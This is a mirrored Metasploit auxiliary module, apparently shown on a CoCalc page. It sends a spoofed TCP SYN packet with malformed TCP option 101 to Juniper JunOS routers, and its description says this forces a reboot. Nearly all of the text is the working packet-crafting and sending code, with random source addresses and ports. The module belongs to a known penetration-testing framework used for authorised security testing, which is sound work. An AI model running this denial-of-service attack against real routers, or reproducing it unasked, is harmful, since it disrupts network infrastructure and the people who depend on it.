Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
19592 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Capture
8
include Msf::Auxiliary::Dos
9
10
def initialize
11
super(
12
'Name' => 'Juniper JunOS Malformed TCP Option',
13
'Description' => %q{
14
This module exploits a denial of service vulnerability
15
in Juniper Network's JunOS router operating system. By sending a TCP
16
packet with TCP option 101 set, an attacker can cause an affected
17
router to reboot.
18
},
19
'Author' => 'todb',
20
'License' => MSF_LICENSE,
21
'References' => [
22
['BID', '37670'],
23
['OSVDB', '61538'],
24
['URL', 'http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']
25
],
26
'Notes' => {
27
'Stability' => [CRASH_OS_RESTARTS],
28
'SideEffects' => [],
29
'Reliability' => []
30
}
31
)
32
33
register_options([
34
OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),
35
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
36
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
37
])
38
39
deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')
40
end
41
42
def rport
43
datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i
44
end
45
46
def sport
47
datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i
48
end
49
50
def shost
51
datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s
52
end
53
54
def run
55
open_pcap
56
57
p = PacketFu::TCPPacket.new
58
p.ip_daddr = rhost
59
p.ip_saddr = shost
60
p.ip_ttl = rand(128..255)
61
p.tcp_sport = sport
62
p.tcp_dport = rport
63
p.tcp_flags.syn = 1
64
p.tcp_win = rand(1..4096)
65
p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol
66
p.recalc
67
print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")
68
capture_sendto(p, rhost)
69
close_pcap
70
end
71
end
72
73